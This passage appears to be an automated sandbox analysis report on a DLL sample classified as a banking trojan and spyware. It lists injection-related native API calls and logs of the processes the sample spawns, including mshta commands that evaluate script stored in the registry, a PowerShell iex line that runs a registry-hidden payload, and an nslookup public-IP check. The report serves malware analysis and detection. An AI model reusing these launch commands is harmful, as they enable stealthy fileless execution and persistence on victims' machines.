Source: C:\Windows\System32\control.exe Code function: 34_2_00938DF4 34_2_00938DF4
Source: C:\Windows\System32\control.exe Code function: 34_2_00949524 34_2_00949524
Source: C:\Windows\System32\control.exe Code function: 34_2_00937D44 34_2_00937D44
Source: C:\Windows\System32\control.exe Code function: 34_2_0093FD6C 34_2_0093FD6C
Source: C:\Windows\System32\control.exe Code function: 34_2_0092C6F4 34_2_0092C6F4
Source: C:\Windows\System32\control.exe Code function: 34_2_00946E34 34_2_00946E34
Source: C:\Windows\System32\control.exe Code function: 34_2_00928628 34_2_00928628
Source: C:\Windows\System32\control.exe Code function: 34_2_0092779C 34_2_0092779C
Source: C:\Windows\System32\control.exe Code function: 34_2_0093DFB8 34_2_0093DFB8
Source: C:\Windows\System32\control.exe Code function: 34_2_00943F08 34_2_00943F08
Source: C:\Windows\System32\control.exe Code function: 34_2_00939770 34_2_00939770
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DF2F0 45_2_000002D2D67DF2F0
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DB530 45_2_000002D2D67DB530
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C6A68 45_2_000002D2D67C6A68
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EEB10 45_2_000002D2D67EEB10
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E3F08 45_2_000002D2D67E3F08
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CC6F4 45_2_000002D2D67CC6F4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E32EC 45_2_000002D2D67E32EC
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67ED2DC 45_2_000002D2D67ED2DC
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C2B74 45_2_000002D2D67C2B74
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D9770 45_2_000002D2D67D9770
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D6B1C 45_2_000002D2D67D6B1C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CE008 45_2_000002D2D67CE008
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C3804 45_2_000002D2D67C3804
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DDFB8 45_2_000002D2D67DDFB8
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C779C 45_2_000002D2D67C779C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D179C 45_2_000002D2D67D179C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E508C 45_2_000002D2D67E508C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EC874 45_2_000002D2D67EC874
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C9074 45_2_000002D2D67C9074
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D3074 45_2_000002D2D67D3074
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D0474 45_2_000002D2D67D0474
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7834 45_2_000002D2D67D7834
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D3C24 45_2_000002D2D67D3C24
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E64F4 45_2_000002D2D67E64F4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EE0CF 45_2_000002D2D67EE0CF
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D40B4 45_2_000002D2D67D40B4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E4988 45_2_000002D2D67E4988
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DFD6C 45_2_000002D2D67DFD6C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DD150 45_2_000002D2D67DD150
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7D44 45_2_000002D2D67D7D44
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E9524 45_2_000002D2D67E9524
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D8DF4 45_2_000002D2D67D8DF4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DC9F0 45_2_000002D2D67DC9F0
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CB1D8 45_2_000002D2D67CB1D8
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DC1D4 45_2_000002D2D67DC1D4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D85CC 45_2_000002D2D67D85CC
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DD9AC 45_2_000002D2D67DD9AC
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E59A8 45_2_000002D2D67E59A8
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EDD9C 45_2_000002D2D67EDD9C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DED94 45_2_000002D2D67DED94
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7278 45_2_000002D2D67D7278
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EAA6C 45_2_000002D2D67EAA6C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D9268 45_2_000002D2D67D9268
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E6E34 45_2_000002D2D67E6E34
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C8628 45_2_000002D2D67C8628
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D8218 45_2_000002D2D67D8218
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009788BB 49_2_009788BB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096E9BD 49_2_0096E9BD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009852A0 49_2_009852A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00964AFE 49_2_00964AFE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00982339 49_2_00982339
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00972499 49_2_00972499
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00972C07 49_2_00972C07
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097C5F4 49_2_0097C5F4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00965518 49_2_00965518
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096AD2E 49_2_0096AD2E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00974658 49_2_00974658
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096279B 49_2_0096279B
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D1F8 CreateProcessAsUserW, 0_2_0456D1F8
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\System32\loaddll32.exe Section loaded: mspdb140.dll
Uses 32bit PE files
Source: data.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B121F NtMapViewOfSection, 0_2_6E4B121F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6E4B1A1C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2013 GetProcAddress,NtCreateSection,memset, 0_2_6E4B2013
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2495 NtQueryVirtualMemory, 0_2_6E4B2495
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00DD22EC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD3C64 GetProcAddress,NtCreateSection,memset, 0_2_00DD3C64
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD37E0 NtMapViewOfSection, 0_2_00DD37E0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD8055 NtQueryVirtualMemory, 0_2_00DD8055
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0456DE77
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04566EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_04566EB0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04567FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_04567FDD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04570FA5 NtQueryInformationProcess, 0_2_04570FA5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045692F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_045692F3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04575AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_04575AED
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04561305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_04561305
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04577419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_04577419
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A42B NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0457A42B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045736C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_045736C0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04576F70 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_04576F70
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_04564851
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_0456D812
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D00C memset,NtQueryInformationProcess, 0_2_0456D00C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564173 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_04564173
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04579180 NtGetContextThread,RtlNtStatusToDosError, 0_2_04579180
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457DBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0457DBCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBA42B NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_04BBA42B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA6EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_04BA6EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB969C memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 3_2_04BB969C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BADE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_04BADE77
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB0FA5 NtQueryInformationProcess, 3_2_04BB0FA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA7FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_04BA7FDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB680B NtMapViewOfSection, 3_2_04BB680B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4173 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_04BA4173
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA92F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_04BA92F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB5AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_04BB5AED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBA21F GetProcAddress,NtCreateSection,memset, 3_2_04BBA21F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA1305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_04BA1305
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB7419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_04BB7419
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB36C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_04BB36C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB6F70 NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_04BB6F70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAD812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_04BAD812
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAD00C memset,NtQueryInformationProcess, 3_2_04BAD00C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_04BA4851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB9180 NtGetContextThread,RtlNtStatusToDosError, 3_2_04BB9180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBDBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_04BBDBCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A722EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_04A722EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A78055 NtQueryVirtualMemory, 5_2_04A78055
Source: C:\Windows\System32\control.exe Code function: 34_2_0092A8D4 NtWriteVirtualMemory, 34_2_0092A8D4
Source: C:\Windows\System32\control.exe Code function: 34_2_0092B92C NtReadVirtualMemory, 34_2_0092B92C
Source: C:\Windows\System32\control.exe Code function: 34_2_0093FAA8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 34_2_0093FAA8
Source: C:\Windows\System32\control.exe Code function: 34_2_009252DC NtMapViewOfSection, 34_2_009252DC
Source: C:\Windows\System32\control.exe Code function: 34_2_00921A58 NtQueryInformationToken,NtQueryInformationToken,NtClose, 34_2_00921A58
Source: C:\Windows\System32\control.exe Code function: 34_2_00922B08 NtQueryInformationProcess, 34_2_00922B08
Source: C:\Windows\System32\control.exe Code function: 34_2_0092A444 RtlAllocateHeap,NtQueryInformationProcess, 34_2_0092A444
Source: C:\Windows\System32\control.exe Code function: 34_2_00947DAC NtCreateSection, 34_2_00947DAC
Source: C:\Windows\System32\control.exe Code function: 34_2_00940DE0 NtAllocateVirtualMemory, 34_2_00940DE0
Source: C:\Windows\System32\control.exe Code function: 34_2_0093179C NtSetContextThread,NtUnmapViewOfSection,NtClose, 34_2_0093179C
Source: C:\Windows\System32\control.exe Code function: 34_2_0095F002 NtProtectVirtualMemory,NtProtectVirtualMemory, 34_2_0095F002
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C2B08 NtQueryInformationProcess, 45_2_000002D2D67C2B08
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose, 45_2_000002D2D67C1A58
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67FF002 NtProtectVirtualMemory,NtProtectVirtualMemory, 45_2_000002D2D67FF002
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00961305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 49_2_00961305
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 49_2_0096DE77
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00970FA5 NtQueryInformationProcess, 49_2_00970FA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00967FDD memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 49_2_00967FDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096D812 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 49_2_0096D812
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096D00C memset,NtQueryInformationProcess, 49_2_0096D00C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00977419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 49_2_00977419
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00976F70 NtQuerySystemInformation,RtlNtStatusToDosError, 49_2_00976F70
PE file does not import any functions
Source: aixojixg.dll.20.dr Static PE information: No import functions for PE file found
Source: keehvxm3.dll.24.dr Static PE information: No import functions for PE file found
Source: a52acufz.dll.19.dr Static PE information: No import functions for PE file found
Source: ddwuzigh.dll.23.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: data.dll Binary or memory string: OriginalFilenameSoon.dll8 vs data.dll
Source: data.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211007
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: data.dll Virustotal: Detection: 7%
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\data.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD11B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 0_2_00DD11B8
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{023FD26A-79F2-8479-1356-BDF8F7EA41AC}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{5E9A7C9C-253E-40D9-9F72-297443C66DE8}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_01
